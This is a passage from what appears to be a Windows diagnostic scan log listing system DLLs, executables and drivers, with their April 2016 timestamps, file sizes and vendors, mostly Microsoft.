2016-04-14 03:21 - 2016-04-14 03:21 - 00882720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00881664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Input.Inking.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00874968 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2016-04-14 03:21 - 2016-04-14 03:21 - 00870912 _____ (Microsoft Corporation) C:\WINDOWS\system32\MPSSVC.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00870400 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00859136 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00854528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Bluetooth.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00852480 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsStore.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00848896 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00848896 _____ (Microsoft Corporation) C:\WINDOWS\system32\samsrv.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00848168 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00847360 _____ (Microsoft Corporation) C:\WINDOWS\system32\netlogon.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00841216 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00838144 _____ (Microsoft Corporation) C:\WINDOWS\system32\uDWM.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00828928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.AccountsControl.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00821760 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00821248 _____ (Microsoft Corporation) C:\WINDOWS\system32\fvewiz.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00819648 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmpeg2srcsnk.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00808800 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2016-04-14 03:21 - 2016-04-14 03:21 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\JpMapControl.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00799744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRH.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00794888 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfds.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00794112 _____ (Microsoft Corporation) C:\WINDOWS\system32\BFE.DLL
2016-04-14 03:21 - 2016-04-14 03:21 - 00792064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00791744 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00790528 _____ (Microsoft Corporation) C:\WINDOWS\system32\EmailApis.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00787456 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00784896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NMAA.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00779384 _____ (Microsoft Corporation) C:\WINDOWS\system32\taskschd.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00777728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MsSpellCheckingFacility.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00770640 _____ (Microsoft Corporation) C:\WINDOWS\system32\iuilp.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00769536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ContactApis.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00765952 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00764928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Cred.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00764928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00755712 _____ (Microsoft Corporation) C:\WINDOWS\system32\spoolsv.exe
2016-04-14 03:21 - 2016-04-14 03:21 - 00754176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00730344 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Shell.Broker.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00726528 _____ (Microsoft Corporation) C:\WINDOWS\system32\ChatApis.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00713824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmpeg2srcsnk.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00713728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netlogon.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00713568 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00712704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RemoteNaturalLanguage.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00711680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapControlCore.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00709688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00708608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Web.Core.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00705536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00703840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe
2016-04-14 03:21 - 2016-04-14 03:21 - 00700416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppointmentApis.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00696664 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupEngine.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00694784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdiWiFi.sys
2016-04-14 03:21 - 2016-04-14 03:21 - 00688640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.Connectivity.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00686976 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsapi.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00686592 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00685568 _____ (Microsoft Corporation) C:\WINDOWS\system32\scapi.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00682496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Input.Inking.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00676352 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSDApi.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00673792 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00670928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfds.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00652392 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxgi.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00649728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00649216 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngcsvc.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00641536 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00640472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00638464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00638464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00630632 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2016-04-14 03:21 - 2016-04-14 03:21 - 00630272 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneProviders.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00628736 _____ (Microsoft Corporation) C:\WINDOWS\system32\MessagingDataModel2.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00625000 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00617984 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00613376 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSync.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00606720 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmsvc.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00605440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2016-04-14 03:21 - 2016-04-14 03:21 - 00592384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00591872 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmsRouterSvc.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00587776 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00585216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.AccountsControl.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00576864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2016-04-14 03:21 - 2016-04-14 03:21 - 00575488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EmailApis.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00572272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\taskschd.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00567808 _____ (Microsoft Corporation) C:\WINDOWS\system32\MCRecvSrc.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00564224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WSDApi.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00563552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\acpi.sys
2016-04-14 03:21 - 2016-04-14 03:21 - 00558080 _____ (Microsoft Corporation) C:\WINDOWS\system32\MBMediaManager.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00556032 _____ (Microsoft Corporation) C:\WINDOWS\system32\PsmServiceExtHost.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00555520 _____ (Microsoft Corporation) C:\WINDOWS\system32\SyncController.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00552960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppointmentApis.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00550912 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00541304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2016-04-14 03:21 - 2016-04-14 03:21 - 00540160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ChatApis.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00538736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00536256 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00535080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dnsapi.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00534368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBHUB3.SYS
2016-04-14 03:21 - 2016-04-14 03:21 - 00530432 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\nwifi.sys
2016-04-14 03:21 - 2016-04-14 03:21 - 00526336 _____ (Microsoft Corporation) C:\WINDOWS\system32\FirewallAPI.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00523752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxgi.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00521728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.Connectivity.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00517632 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2016-04-14 03:21 - 2016-04-14 03:21 - 00513888 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00503296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSync.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00502104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupEngine.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00498688 _____ (Microsoft Corporation) C:\WINDOWS\system32\tileobjserver.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00498448 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFCaptureEngine.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00498176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MessagingDataModel2.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00496128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.Web.Core.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00493568 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmkvsrcsnk.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00489984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00480256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MCRecvSrc.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00476728 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvproc.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00471552 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupShim.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00463360 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansec.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00460288 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapConfiguration.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00456704 _____ (Microsoft Corporation) C:\WINDOWS\system32\ipnathlp.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00451584 _____ (Microsoft Corporation) C:\WINDOWS\system32\werui.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00450912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFCaptureEngine.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00450560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SyncController.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00450560 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Bluetooth.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00440320 _____ (Microsoft Corporation) C:\WINDOWS\system32\CredProvDataModel.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00438784 _____ (Microsoft Corporation) C:\WINDOWS\system32\AccountsRt.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00436736 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00430944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
2016-04-14 03:21 - 2016-04-14 03:21 - 00420928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvproc.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00418304 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmenrollengine.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00415232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00414720 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvr.exe
2016-04-14 03:21 - 2016-04-14 03:21 - 00412672 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanmsm.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00411648 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleacc.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00408120 _____ (Microsoft Corporation) C:\WINDOWS\system32\AUDIOKSE.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00402432 _____ (Microsoft Corporation) C:\WINDOWS\system32\FWPUCLNT.DLL
2016-04-14 03:21 - 2016-04-14 03:21 - 00401408 _____ (Microsoft Corporation) C:\WINDOWS\system32\sharemediacpl.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00400896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2016-04-14 03:21 - 2016-04-14 03:21 - 00394752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\werui.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00394080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2016-04-14 03:21 - 2016-04-14 03:21 - 00389992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanapi.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00382464 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00379392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmkvsrcsnk.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00378208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBXHCI.SYS
2016-04-14 03:21 - 2016-04-14 03:21 - 00376536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.MediaControl.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00374008 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsAdminFlows.exe
2016-04-14 03:21 - 2016-04-14 03:21 - 00372224 _____ (Microsoft Corporation) C:\WINDOWS\system32\MDEServer.exe
2016-04-14 03:21 - 2016-04-14 03:21 - 00369912 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiodg.exe
2016-04-14 03:21 - 2016-04-14 03:21 - 00369664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\FirewallAPI.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00365568 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00361472 _____ (Microsoft Corporation) C:\WINDOWS\system32\bdesvc.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00360448 _____ (Microsoft Corporation) C:\WINDOWS\system32\vaultsvc.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00358752 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00358400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AccountsRt.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00354304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupShim.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00350720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CredProvDataModel.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00346624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapConfiguration.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00345600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TextInputFramework.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00342528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00339968 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorService.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00338432 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncbservice.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00334736 _____ (Microsoft Corporation) C:\WINDOWS\system32\policymanager.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00333824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\portcls.sys
2016-04-14 03:21 - 2016-04-14 03:21 - 00330240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00328192 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvc.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00324608 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXTaskFactory.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00324608 _____ (Microsoft Corporation) C:\WINDOWS\system32\fvecpl.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00323072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleacc.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00320000 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSFlacDecoder.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00318976 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00315904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Bluetooth.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00307712 _____ (Microsoft Corporation) C:\WINDOWS\system32\usbmon.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00306176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00305664 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifiprofilessettinghandler.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00303104 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00300104 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppHost.exe
2016-04-14 03:21 - 2016-04-14 03:21 - 00297472 _____ (Microsoft Corporation) C:\WINDOWS\system32\thumbcache.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00296488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\policymanager.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00294752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00288768 _____ (Microsoft Corporation) C:\WINDOWS\system32\vaultcli.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00288256 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveui.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00287712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.MediaControl.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00286720 _____ (Microsoft Corporation) C:\WINDOWS\system32\deviceaccess.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00285696 _____ (Microsoft Corporation) C:\WINDOWS\system32\VEEventDispatcher.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00285696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys
2016-04-14 03:21 - 2016-04-14 03:21 - 00284672 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsrslvr.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00278528 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationObjFactory.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00277856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys
2016-04-14 03:21 - 2016-04-14 03:21 - 00275456 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExSMime.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\DisplayManager.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00269824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\FWPUCLNT.DLL
2016-04-14 03:21 - 2016-04-14 03:21 - 00269824 _____ (Microsoft Corporation) C:\WINDOWS\system32\moshostcore.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00266752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSFlacDecoder.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00261376 _____ (Microsoft Corporation) C:\WINDOWS\system32\LsaIso.exe
2016-04-14 03:21 - 2016-04-14 03:21 - 00258912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ufx01000.sys
2016-04-14 03:21 - 2016-04-14 03:21 - 00258560 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataAccountApis.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00258280 _____ (Microsoft Corporation) C:\WINDOWS\system32\sqmapi.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00256000 _____ (Microsoft Corporation) C:\WINDOWS\system32\accountaccessor.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00253088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LockAppHost.exe
2016-04-14 03:21 - 2016-04-14 03:21 - 00252928 _____ (Microsoft Corporation) C:\WINDOWS\system32\PimIndexMaintenance.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00250880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00245760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TextInputFramework.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00243712 _____ (Microsoft Corporation) C:\WINDOWS\system32\cemapi.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00239616 _____ (Microsoft Corporation) C:\WINDOWS\system32\credprovhost.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00239104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NotificationObjFactory.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00238592 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xboxgip.sys
2016-04-14 03:21 - 2016-04-14 03:21 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\thumbcache.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00235008 _____ C:\WINDOWS\system32\MTF.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00230400 _____ (Microsoft Corporation) C:\WINDOWS\system32\DAFWSD.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00228352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\deviceaccess.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00228352 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsqmcons.exe
2016-04-14 03:21 - 2016-04-14 03:21 - 00224256 _____ (Microsoft Corporation) C:\WINDOWS\system32\PackageStateRoaming.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00223744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExSMime.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00223232 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapibase.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00221184 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneCallHistoryApis.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00220064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sqmapi.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00219648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VEEventDispatcher.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00216576 _____ (Microsoft Corporation) C:\WINDOWS\system32\QuickActionsDataModel.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00216416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00214528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Scanners.dll
